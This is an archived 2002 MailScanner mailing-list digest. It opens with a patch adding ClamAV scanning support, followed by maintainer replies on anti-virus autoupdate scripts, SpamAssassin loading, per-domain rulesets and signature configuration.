+#!/bin/sh + +# clamavtwrapper -- invoke ClamAV for use with mailscanner +# +# nwp, 14/12/01 +# +# MailScanner - SMTP E-Mail Virus Scanner +# Copyright (C) 2001 Julian Field +# +# $Id: f-protwrapper,v 1.3 2002/01/10 10:09:55 jkf Exp $ +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation; either version 2 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA +# +# The author, Julian Field, can be contacted by email at +# Jules@JulianField.net +# or by paper mail at +# Julian Field +# Dept of Electronics & Computer Science +# University of Southampton +# Southampton +# SO17 1BJ +# United Kingdom +# +# + + +# You may want to check this script for bash-isms + +PackageDir=/usr/local/f-prot # This may vary depending on your OS +Scanner=f-prot + +ScanOptions="" +ScanOptions="$ScanOptions --unzip" # unzip archives too + +exec /usr/bin/clamscan $ScanOptions "$@" + diff -ru 3.22.orig/usr/share/mailscanner/sweep.pl 3.22/usr/share/mailscanner/sweep.pl --- 3.22-orig/usr/share/mailscanner/sweep.pl 2002-09-10 09:01:02.000000000 +0100 +++ 3.22/usr/share/mailscanner/sweep.pl 2002-09-23 22:54:05.000000000 +0100 @@ -173,6 +173,16 @@ SupportScanning => $S_UNSUPPORTED, SupportDisinfect => $S_UNSUPPORTED, }, + "clamav" => { + Lock => 'ClamAV.lock', + CommonOptions => '-r --disable-summary --stdout', + DisinfectOptions => '', + ScanOptions => '', + InitParser => \&InitClamAVParser, + ProcessOutput => \&ProcessClamAVOutput, + SupportScanning => $S_BETA, + SupportDisinfect => $S_NONE, + }, "none" => { Lock => 'NoneBusy.lock', CommonOptions => '', @@ -507,6 +517,13 @@ ; } +# Initialise any state variables the ClamAV output parser uses +my ($clamav_archive); +sub InitClamAVParser { + $clamav_archive = ""; +} + + # These functions must be called with, in order: # * The line of output from the scanner # * A reference to the hash containing problem details @@ -1022,6 +1039,66 @@ return 0; } +# Process ClamAV (v0.22) output +sub ProcessClamAVOutput { + my($line, $infections, $types, $BaseDir) = @_; + + if ($line =~ /^ERROR:/ or $line =~ /^execv\(p\):/) + { + chomp $line; + Log::WarnLog($line); + return 0; + } + + # clamscan currently stops as soon as one virus is found + # therefore there is little point saying which part + # it's still a start mind! + + # Only tested with --unzip since only windows boxes get viruses ;-) + + if (/^Archive: (.*)$/) + { + $clamav_archive = $1; + return 0; + } + return 0 if /^ /; # " inflating", " deflating.." from --unzip + if ($clamav_archive && /^$clamav_archive:/) + { + $clamav_archive = ""; + return 0; + } + + return 0 if /OK$/; + + if (/^(.*?): (.*) FOUND$/) + { + my ($file, $subfile, $virus, $report); + $virus = $2; + if ($clamav_archive) + { + $file = $clamav_archive; + ($subfile = $1) =~ s/^.*\///; # get basename of file + $report = "in $subfile (possibly others)"; + } + else + { + $file = $1; + } + + $file =~ s/^(.\/)?$BaseDir\/?//; + $file =~ s/^\.\///; + my ($id,$part) = split /\//, $file, 2; + + $infections->{"$id"}{"$part"} .= "$part contains $virus $report\n"; + $types->{"$id"}{"$part"} .= "v"; + return 1; + } + + chomp $line; + Log::WarnLog("ProcessClamAVOutput: unrecognised line \"$line\"\n"); + return 0; +} + sub CallOwnChecking { my($BaseDir, $mime, $infections, $inftypes) = @_; From mailscanner at ecs.soton.ac.uk Mon Sep 23 23:10:34 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:44 2006 Subject: F-Prot Autoupdate In-Reply-To: <00ec01c2633a$61d1fd40$6701a8c0@matthew> Message-ID: <5.1.0.14.2.20020923230722.02296478@imap.ecs.soton.ac.uk> At 20:49 23/09/2002, you wrote: >Using the perl update script for F-prot provided by MailScanner I always >get: "Unknown fatal error calling "checksum", exiting., Bad file descriptor >at autoupdate line 294, chunk 2.". What directory do you have f-prot installed in? What directory contains the "checksum" f-prot program? What happens when you do "ldd checksum" (once you've found the right directory)? Is this script working for other people? -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 23 23:28:30 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:44 2006 Subject: Users' Comments Book In-Reply-To: Message-ID: <5.1.0.14.2.20020923232215.024d1cd8@imap.ecs.soton.ac.uk> At 23:11 23/09/2002, you wrote: >Julian's so good, not only can he code a new rev, >he can back port goodies to the old rev, >he can ALSO install new software on the web site. >He's secretly an octopus overdosing on caffeine, >and has four computers going full blast all the time! Aw shucks... I don't sleep too much, I know that, but I admit I do have 4 PC's in my office running all day :-) By the way, I only do MailScanner in between everything else I do at work. I work as part of a team of 8, supporting a department of 1500 people (half undergraduates, half research students and staff). If you want to see what I do all day, read this: http://www.ecs.soton.ac.uk/~jkf/myjob.html Oh, and by the way, I just released 4.00.0.a5 to fix today's bug-ettes. As they say across the pond: Enjoy! Jules. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 23 22:59:44 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:44 2006 Subject: ignoring text in character set `WINDOWS-1252' In-Reply-To: <200209231732.g8NHWnr23795@ori.rl.ac.uk> Message-ID: <5.1.0.14.2.20020923225836.022bf598@imap.ecs.soton.ac.uk> At 18:32 23/09/2002, you wrote: >Hi, >I`ve this error in my server. > >ignoring text in character set `WINDOWS-1252' > at /usr/lib/perl5/site_perl/5.6.1/MIME/Parser/Filer.pm line 646 > >Somebody can help me???? If someone can work out how to make MIME-tools handle other character sets better, I would dearly like to know. I have mailed the author several times about this, and got no response whatsoever. I believe it is possible, but I can't figure out how from the docs at all. If you want to have a go, the author's site is www.zeegee.com. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 23 23:06:07 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:44 2006 Subject: V4 and viruses to delete In-Reply-To: Message-ID: <5.1.0.14.2.20020923230225.024b7ca8@imap.ecs.soton.ac.uk> At 20:35 23/09/2002, you wrote: >What would be an example for the rule file for this option to work? I assume you're talking about the "Silent Viruses" option. You can just give it a space-separated list of virus names, like this: Silent Viruses = Klez Yaha-E If you want to give it the filename of a ruleset, then that file could contain something like To *@domain1.com Yaha-E To *@domain2.com Klez Sircam-A This is one of the keywords that I couldn't really think why you might want to use a ruleset, but didn't see any good reason to stop you if you wanted to. If you can tell me what you are trying to achieve, that would help me produce a better example for you. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 23 23:01:23 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:44 2006 Subject: Problem with per-domain scanning In-Reply-To: <003001c26329$bd7cd900$7f00000a@rd.csandall.com> Message-ID: <5.1.0.14.2.20020923230045.0222e8f0@imap.ecs.soton.ac.uk> Can you mail me your mailscanner.conf file please (just to me, not the list). And it would help quite a bit if I knew what version you are running :-) At 18:50 23/09/2002, you wrote: >I am presently setting up MailScanner with SpamAssassin to do per-domain >scanning. If I enable the per domain scanning, MailScanner seems to >ignore the file that has the list of domains. I have checked the paths, >and the path in the mailscanner.conf does indeed point to the correct >file. I've tried stopping all sendmail services and mailscanner, and >restarting, but still the same result. It DOES tag the email, saying it >was not scanned - so I know MailScanner is indeed still processing the >mail. In my domains.to.scan.conf file, I have listed the domains as such: > >*.domain1.tld >domain2.tld > > >..and it still ignores on all counts. If I tell the system to scan all >emails and not use the domains.to.scan.conf file, it does indeed work and >scans and tags everything like it should. > >Any ideas? > >Devin -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.mailscanner.info/pipermail/mailscanner/attachments/20020923/5c3d1135/attachment.html From mailscanner at ecs.soton.ac.uk Mon Sep 23 23:11:50 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:44 2006 Subject: Version 4.00.0a4 In-Reply-To: References: <5.1.0.14.2.20020923145441.04ac6448@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020923231050.0251fea0@imap.ecs.soton.ac.uk> At 21:39 23/09/2002, you wrote: >When you are making changes to the code for the V4 generation, are you >only changing bin/mailscanner, or do I need everything within >the tarball each time? The bin/mailscanner script is more likely to stay the same than any of the other files :-) I would definitely grab the whole thing, not just the little bin/mailscanner script. > I'm thinking about just symlinking /opt/MailScanner to whatever the > tarball creates when I extract it and >then copying my mailscanner.conf back over. That's the best idea. >-----Original Message----- >From: MailScanner mailing list [mailto:MAILSCANNER@JISCMAIL.AC.UK]On >Behalf Of Julian Field >Sent: Monday, September 23, 2002 8:57 AM >To: MAILSCANNER@JISCMAIL.AC.UK >Subject: Re: Version 4.00.0a4 > > >At 14:43 23/09/2002, you wrote: > >Thanks > > > >If I start with "Load SpamAssasin = yes" I get > > > >Can't locate Mail/SpamAssassin.pm in @INC (@INC contains: > >/opt/MailScanner/bin /usr/lib/perl5/5.6.0/i386-linux /usr/lib/perl5/5.6.0 > >/usr/lib/perl5/site_perl/5.6.0/i386-linux /usr/lib/perl5/site_perl/5.6.0 > >/usr/lib/perl5/site_perl .) at MailScanner/SA.pm line 69 > >Have you installed SpamAssassin? If not, then I would fully expect "Load >SpamAssassin=yes" to fail. > > >Also just noticed I got > > > >We haven't got any child processes, which isn't right!, No child processes > >at /opt/MailScanner/bin/mailscanner line 174. > >We have just tried to reap a process which wasn't one of ours!, No child > >processes at /opt/MailScanner/bin/mailscanner line 177. > >This is because it is aborting while trying to load SpamAssassin. If you >haven't got it installed, then clearly(?) you need to set "Load >SpamAssassin = no". > > >Seems fine if I set to "Load SpamAssasin = no" > > > >I dont have spamassasin installed. > >Aha! Don't tell it to load software you haven't got. Surprisingly enough it >fails :-) > >----- Original Message ----- > >From: Julian Field > >To: MAILSCANNER@JISCMAIL.AC.UK > >Sent: Monday, September 23, 2002 2:22 PM > >Subject: Re: Version 4.00.0a4 > > > >At 12:49 23/09/2002, you wrote: > >>Just trying it out on a totally fresh server. > >> > >>Looks really good, comments are > >> > >>1. Sophos.install - does not point to the new location for sophos-wrapper > >>and sophos-autoupdate scripts. > >Fixed. > > > >>2. If "Use SpamAssassin = no" and "Load SpamAssassin = yes" in > >>mailscanner.conf, it does try to use spamassasin. I would have expected > >>the "Use SpamAssassin = no" to have precedence. > >Does it try to use it, or just try to load it? > >Working out whether "Use SpamAssassin" is yes or no is no longer easy > >because it could be a ruleset rather than a simple value. That's why I put > >in the "Load SpamAssassin" option in, as that has to be just yes or no. > > > >>Im very interested in the ability to do different signatures for > >>different domains, and will be trying that out next, I was looking at the > >>example and it seemed to apply for outgoing mail only e.g. > >> > >> From: *@domain1.com > >> /opt/MailScanner/etc/reports/domain1.sig.txt > >> From: *@domain2.com > >> /opt/MailScanner/etc/reports/domain2.sig.txt > >> > >>Does this work for for To: as well? e.g. > >> > >> To: *@domain1.com > >> /opt/MailScanner/etc/reports/domain1.sig.txt > >> To: *@domain2.com > >> /opt/MailScanner/etc/reports/domain2.sig.txt > >You can have "from", "to" or "fromto" or "tofrom" etc in the first field. > >It just looks at the first word for the word "from" and for the word "to" > >so if you want both then you can combine them how you like. So I would do > > FromTo: *@domain1.com > > /opt/MailScanner/etc/reports/domain1.sig.txt > > FromTo: *@domain2.com > > /opt/MailScanner/etc/reports/domain2.sig.txt > > > >Don't forget to set the HTML sigs as well as the txt ones. > >-- > >Julian Field Teaching Systems Manager > >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > >Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > >-- > >This message has been scanned for viruses and > >dangerous content by MailScanner, and is > >believed to be clean. > > > > > >-- > >This message has been scanned for viruses and > >dangerous content by MailScanner, and is > >believed to be clean. > >-- >Julian Field Teaching Systems Manager >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science >Tel. 023 8059 2817 University of Southampton > Southampton SO17 1BJ -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 23 22:58:25 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:44 2006 Subject: SV: Fix in uvscan/autoupdate In-Reply-To: <7B475DC5E9502B4D91EA73C283AE48D70263EB4D@lkl22.ltkalmar.se > Message-ID: <5.1.0.14.2.20020923225809.02517e38@imap.ecs.soton.ac.uk> At 17:59 23/09/2002, you wrote: >As the bad perl knowledge I got I need to ask where these >lines are supposed to be in the script? Around line 66 as it says at the start of the patch. >/Anders > > > -----Ursprungligt meddelande----- > > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > > Skickat: den 23 september 2002 18:11 > > Till: MAILSCANNER@JISCMAIL.AC.UK > > ?mne: Fix in uvscan/autoupdate > > > > > > There appears to have been a change in the syntax of the McAfee uvscan > > program, which means that the "autoupdate" script for it will > > bail out with > > a "no target specified for scanning" error. > > > > To fix this, just apply this tiny change to uvscan/autoupdate (or > > lib/mcafee-autoupdate in V4). > > > > --- autoupdate.old Mon Sep 23 11:01:01 2002 > > +++ autoupdate Mon Sep 23 11:11:31 2002 > > @@ -66,7 +66,7 @@ > > # to see if the new dat's are o.k attempt to run mcafee > > with them and > > # check for errors > > print STDERR "About to run mcafee\n"; > > -open(MCAFEETEST, "$mcafee -d $mcafeeroot | "); > > +open(MCAFEETEST, "$mcafee -d $mcafeeroot . | "); > > print STDERR "Running mcafee\n"; > > while(){ > > chomp; > > -- > > Julian Field Teaching Systems Manager > > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > > Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > > -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 23 23:42:32 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:44 2006 Subject: RBL checks In-Reply-To: <1032793977.1791.36.camel@wilowisp.dynetics.com> Message-ID: <5.1.0.14.2.20020923234014.039f3178@imap.ecs.soton.ac.uk> At 16:12 23/09/2002, you wrote: >mailscanner.conf includes: > ># If the message sender is on any of the Spam Lists, do you still want ># to do the SpamAssassin checks? Setting this to "no" will reduce the >load ># on your server, but will stop the High Scoring Spam Actions from ever ># happening. ># This can also be the filename of a ruleset. >Check SpamAssassin If On Spam List = yes > >Is is possible to define actions to be taken in the ruleset based of >which DNS list matched? I.e., can I send a bounce including text >indicating what DNS list the sender is on? And if so what would the >ruleset look like? If you look in the /opt/MailScanner/etc/reports/sender.spam.rbl.report.txt, you can put in "$spamreport" in the message to include the list of RBL's that triggered. It's in sender.spam.report.txt too. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 23 23:39:49 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:44 2006 Subject: Kaspersky 4.0.1.0 In-Reply-To: <1032794413.4240.12.camel@rh73wkstn.csconsultants.net> Message-ID: <5.1.0.14.2.20020923233920.039f54e8@imap.ecs.soton.ac.uk> At 16:20 23/09/2002, you wrote: >Anything new on support for Kaspersky ver 4.0.1.0 ? I am trying to get >Kaspersky to work properly with Mailscanner to no avail. The kavscanner >runs fine manually, but when it is called by the wrapper it never >completes a scan. I have Mailscanner ver 3.22-14 running on a RH 7.2 >box, it works fine with Sophos but when I make the changes for kaspersky >I get "Commercial scanner kaspersky times out!" and "Denial Of Service >attack detected!" I was using the eicar test file. If you can get me a copy of Kaspersky to use for development, I (or Nick) will take a look at it for you. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 23 23:38:54 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:44 2006 Subject: Virus Sent From My Subnet In-Reply-To: <00e301c26311$58acaae0$6701a8c0@matthew> References: <5.1.0.14.2.20020920190113.036f5d48@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020923094048.0247e2f0@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020923233841.039d2ea8@imap.ecs.soton.ac.uk> At 15:56 23/09/2002, you wrote: > > >Will this be a possible config option in version 4? This does solve the > > >problem quite nicely. > > > > Is it really worth making an extra config item for it? Why not just do it > > for all the "notices"? It doesn't get sent to users, only sysadmins, so a > > bit of extra info shouldn't do any harm. > >I just realized something. Sendmail does a reverse dns lookup on all >connections. If the virus originated in any of my IP pool's it will have my >reverse DNS lookup in it. I can just search for that. Ho hum. It's written now :-) -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mailscanner at ecs.soton.ac.uk Mon Sep 23 23:37:52 2002 From: mailscanner at ecs.soton.ac.uk (Julian Field) Date: Thu Jan 12 21:15:44 2006 Subject: Version 4.00.0a4 In-Reply-To: <029501c2630c$256923c0$7b10140a@education.bcc.lan> References: <5.1.0.14.2.20020923141642.04906840@imap.ecs.soton.ac.uk> <5.1.0.14.2.20020923145441.04ac6448@imap.ecs.soton.ac.uk> Message-ID: <5.1.0.14.2.20020923233324.02461520@imap.ecs.soton.ac.uk> At 15:18 23/09/2002, you wrote: >My original question was > > >>If "Use SpamAssassin = no" and "Load SpamAssassin = yes" in >mailscanner.conf, it does try to use >>spamassasin. I would have expected >the "Use SpamAssassin = no" to have precedence. Afraid not. As the "Use" line can be a ruleset, I would have to cheat a bit (which I haven't done yet) to be able to tell that it's just "no" and not a ruleset which happens to produce the value "no" for a particular message. Can see your point though, so it may change... :) >The default in the file was > >Use SpamAssassin = yes >Load SpamAssassin = yes > >So when the error message first appeared I just set > >Use SpamAssassin = no > >And expected it not to do anything with Spam Assassin, however the error >continued untill > >Load SpamAssassin = no > >I know its a very simple problem and easy to just set both to no, and >thinking about it now I imagine the default when you do a release will be >no/no so the problem after someone first installs it, will not occur. Right, okay, I see the problem now. I've changed the default in 4a5 to no and no, instead of yes and yes. >Im just used to the "master" switch of "Use SpamAssassin". Sorry, that had to change due to the possibility of it being a ruleset. It does mean that you can selectively switch SpamAssassin on and off for particular addresses / domains. >----- Original Message ----- >From: "Julian Field" >To: >Sent: Monday, September 23, 2002 2:56 PM >Subject: Re: Version 4.00.0a4 > > > > At 14:43 23/09/2002, you wrote: > > >Thanks > > > > > >If I start with "Load SpamAssasin = yes" I get > > > > > >Can't locate Mail/SpamAssassin.pm in @INC (@INC contains: > > >/opt/MailScanner/bin /usr/lib/perl5/5.6.0/i386-linux /usr/lib/perl5/5.6.0 > > >/usr/lib/perl5/site_perl/5.6.0/i386-linux /usr/lib/perl5/site_perl/5.6.0 > > >/usr/lib/perl5/site_perl .) at MailScanner/SA.pm line 69 > > > > Have you installed SpamAssassin? If not, then I would fully expect "Load > > SpamAssassin=yes" to fail. > > > > >Also just noticed I got > > > > > >We haven't got any child processes, which isn't right!, No child >processes > > >at /opt/MailScanner/bin/mailscanner line 174. > > >We have just tried to reap a process which wasn't one of ours!, No child > > >processes at /opt/MailScanner/bin/mailscanner line 177. > > > > This is because it is aborting while trying to load SpamAssassin. If you > > haven't got it installed, then clearly(?) you need to set "Load > > SpamAssassin = no". > > > > >Seems fine if I set to "Load SpamAssasin = no" > > > > > >I dont have spamassasin installed. > > > > Aha! Don't tell it to load software you haven't got. Surprisingly enough >it > > fails :-) > > >----- Original Message ----- > > >From: Julian Field > > >To: MAILSCANNER@JISCMAIL.AC.UK > > >Sent: Monday, September 23, 2002 2:22 PM > > >Subject: Re: Version 4.00.0a4 > > > > > >At 12:49 23/09/2002, you wrote: > > >>Just trying it out on a totally fresh server. > > >> > > >>Looks really good, comments are > > >> > > >>1. Sophos.install - does not point to the new location for >sophos-wrapper > > >>and sophos-autoupdate scripts. > > >Fixed. > > > > > >>2. If "Use SpamAssassin = no" and "Load SpamAssassin = yes" in > > >>mailscanner.conf, it does try to use spamassasin. I would have expected > > >>the "Use SpamAssassin = no" to have precedence. > > >Does it try to use it, or just try to load it? > > >Working out whether "Use SpamAssassin" is yes or no is no longer easy > > >because it could be a ruleset rather than a simple value. That's why I >put > > >in the "Load SpamAssassin" option in, as that has to be just yes or no. > > > > > >>Im very interested in the ability to do different signatures for > > >>different domains, and will be trying that out next, I was looking at >the > > >>example and it seemed to apply for outgoing mail only e.g. > > >> > > >> From: *@domain1.com > > >> /opt/MailScanner/etc/reports/domain1.sig.txt > > >> From: *@domain2.com > > >> /opt/MailScanner/etc/reports/domain2.sig.txt > > >> > > >>Does this work for for To: as well? e.g. > > >> > > >> To: *@domain1.com > > >> /opt/MailScanner/etc/reports/domain1.sig.txt > > >> To: *@domain2.com > > >> /opt/MailScanner/etc/reports/domain2.sig.txt > > >You can have "from", "to" or "fromto" or "tofrom" etc in the first field. > > >It just looks at the first word for the word "from" and for the word "to" > > >so if you want both then you can combine them how you like. So I would do > > > FromTo: *@domain1.com > > > /opt/MailScanner/etc/reports/domain1.sig.txt > > > FromTo: *@domain2.com > > > /opt/MailScanner/etc/reports/domain2.sig.txt > > > > > >Don't forget to set the HTML sigs as well as the txt ones. > > >-- > > >Julian Field Teaching Systems Manager > > >jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > > >Tel. 023 8059 2817 University of Southampton > > > Southampton SO17 1BJ > > >-- > > >This message has been scanned for viruses and > > >dangerous content by MailScanner, and is > > >believed to be clean. > > > > > > > > >-- > > >This message has been scanned for viruses and > > >dangerous content by MailScanner, and is > > >believed to be clean. > > > > -- > > Julian Field Teaching Systems Manager > > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > > Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > > > > -- > > This message has been scanned for viruses and > > dangerous content by MailScanner, and is > > believed to be clean. > > >-- >This message has been scanned for viruses and >dangerous content by MailScanner, and is >believed to be clean. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From brad at LTINETWORKS.COM Mon Sep 23 23:41:34 2002 From: brad at LTINETWORKS.COM (Brad White) Date: Thu Jan 12 21:15:44 2006 Subject: F-Prot Autoupdate Message-ID: <668289DBBD97D211B8110000F8036816029CA4B2@KILLER-ALR> The f-prot update script works fine for me. -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Monday, September 23, 2002 3:11 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: F-Prot Autoupdate At 20:49 23/09/2002, you wrote: >Using the perl update script for F-prot provided by MailScanner I always >get: "Unknown fatal error calling "checksum", exiting., Bad file descriptor >at autoupdate line 294, chunk 2.". What directory do you have f-prot installed in? What directory contains the "checksum" f-prot program? What happens when you do "ldd checksum" (once you've found the right directory)? Is this script working for other people? -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From andersan at LTKALMAR.SE Mon Sep 23 17:44:41 2002 From: andersan at LTKALMAR.SE (Anders Andersson, IT) Date: Thu Jan 12 21:15:44 2006 Subject: SV: Mcafee update prob Message-ID: <7B475DC5E9502B4D91EA73C283AE48D70263EB4C@lkl22.ltkalmar.se> Dont know if this matter but so far the update havent finished yet but I noticed that i havent got a lockfile for mcaffe. I tried the update for f-prot and that finished in 10 sec on the extra/trial computer so something is strange /Anders > -----Ursprungligt meddelande----- > Fr?n: Anders Andersson, IT [mailto:andersan@LTKALMAR.SE] > Skickat: den 23 september 2002 17:18 > Till: MAILSCANNER@JISCMAIL.AC.UK > ?mne: SV: Mcafee update prob > > > > -----Ursprungligt meddelande----- > > Fr?n: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] > > Skickat: den 23 september 2002 16:02 > > Till: MAILSCANNER@JISCMAIL.AC.UK > > ?mne: Re: Mcafee update prob > > > > > > At 14:44 23/09/2002, you wrote: > > >H > > >Sorry for posting again but Im gona show the boss the > > >setup tomorrow and I cant get the autoupdate to work. > > >Spent all morning trying to figure out where the script > > >go bad but my skills is to low =( > > >This is the msg I get: > > >Mcafee update failed: cannot find the the update file, at > > ./autoupdate line > > >93 > > > > I've just tried the US site and it is running extremely > > slowly, so the FTP > > commands are timing out. Edit the autoupdate script, and look > > right near > > the top of the file. There are a couple of lines that say > > > > #my($ftpsite) = 'ftpeur.nai.com'; # Use faster European > > mirror instead of > > my($ftpsite) = 'ftp.nai.com'; # busy US site > > Did a fast installation on another comp and as you said the > sites are so > slow > Im down to 200 b/s. But at least the script work. > So I took the script and moved it to the server Im about to show > but there I get the same message. > So I guess there have to be something with wrong with my pearl > but I cant figure out what!!! =( > Any other things I might try, could it be that Im missing Net::FTP? > Last time I tried to install it I broke my comp =) > so I hope thats not it... > > /Anders > > > > > Move the "#" from the first line to the second one, and > > you'll be using the > > European mirror site instead, which is working very quickly > > at the moment. > > -- > > Julian Field Teaching Systems Manager > > jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science > > Tel. 023 8059 2817 University of Southampton > > Southampton SO17 1BJ > > > From hciss at HCIWS.COM Tue Sep 24 00:01:19 2002 From: hciss at HCIWS.COM (Matt) Date: Thu Jan 12 21:15:44 2006 Subject: MailScanner 3.x with OpenAntiVirus References: <5070000.1032532738@[192.168.50.4]> Message-ID: <028101c26355$23f31b60$6701a8c0@matthew> >>> http://www.openantivirus.org/latest.php >>>VirusSignatures-latest.zip last modified July 1 2002 04:55:00 AM This does not look real appealing as the last signature update. Matt > The following URL describes how to use MailScanner with the > OpenAntiVirus ScannerDaemon: > > > > Julian, the patches are essentially the same as the ones I sent you > in private email a while back. I've added a few scripts and some > description of the procedure, as you suggested. > > -- > Devin Reade > From brose at MED.WAYNE.EDU Tue Sep 24 00:18:26 2002 From: brose at MED.WAYNE.EDU (Rose, Bobby) Date: Thu Jan 12 21:15:44 2006 Subject: V4 and viruses to delete Message-ID: Thanks. I was just trying to reduce the amount of typing in mailscanner.conf between revs. I had tried this earlier and it doesn't seem to work which was why I asked. What happens is that it never deletes the df/qf files from queue and gets stuck in a loop. It sends the postmaster warning and does remain silent for the sender but since it's still in queue it gets processed over and over. -----Original Message----- From: Julian Field [mailto:mailscanner@ECS.SOTON.AC.UK] Sent: Monday, September 23, 2002 6:06 PM To: MAILSCANNER@JISCMAIL.AC.UK Subject: Re: V4 and viruses to delete At 20:35 23/09/2002, you wrote: >What would be an example for the rule file for this option to work? I assume you're talking about the "Silent Viruses" option. You can just give it a space-separated list of virus names, like this: Silent Viruses = Klez Yaha-E If you want to give it the filename of a ruleset, then that file could contain something like To *@domain1.com Yaha-E To *@domain2.com Klez Sircam-A This is one of the keywords that I couldn't really think why you might want to use a ruleset, but didn't see any good reason to stop you if you wanted to. If you can tell me what you are trying to achieve, that would help me produce a better example for you. -- Julian Field Teaching Systems Manager jkf@ecs.soton.ac.uk Dept. of Electronics & Computer Science Tel. 023 8059 2817 University of Southampton Southampton SO17 1BJ From mike at CAMAROSS.NET Tue Sep 24 00:24:32 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:44 2006 Subject: Version 4.00.0a4 In-Reply-To: <5.1.0.14.2.20020923233324.02461520@imap.ecs.soton.ac.uk> Message-ID: I just noticed this in my maillog. Could this be that the attachment itself was corrupt or something? Sep 23 18:14:57 redline MailScanner[5355]: Scanning 1 messages, 399117 bytes Sep 23 18:14:57 redline MailScanner[5355]: Spam Checks: Starting Premature end of base64 data at /usr/lib/perl5/site_perl/5.6.1/Mail/SpamAssassin/PerMsgStatus.pm line 1914, line 5212. Premature end of base64 data at /usr/lib/perl5/site_perl/5.6.1/Mail/SpamAssassin/PerMsgStatus.pm line 1914, line 5212. From mike at CAMAROSS.NET Tue Sep 24 02:28:14 2002 From: mike at CAMAROSS.NET (Mike Kercher) Date: Thu Jan 12 21:15:44 2006 Subject: Version 4.00 rules Question In-Reply-To: Message-ID: I am trying to implement a rule for different postmasters based on domain name. Is the format below correct? FromTo: *@domain1.com postmaster@domain1.org FromTo: *@domain2.com postmaster@domain2.org FromTo: default postmaster@somewhere.cc From glynn at MAKATI.TECHSQUARE.COM Tue Sep 24 02:57:37 2002 From: glynn at MAKATI.TECHSQUARE.COM (Glynn S. Condez) Date: Thu Jan 12 21:15:44 2006 Subject: Email Vulnerabilities Message-ID: <004301c2636d$c25bb3d0$8201a8c0@proaccessph.com> Based on these website http://www.gfi.com/emailsecuritytest, some of the test email that contents 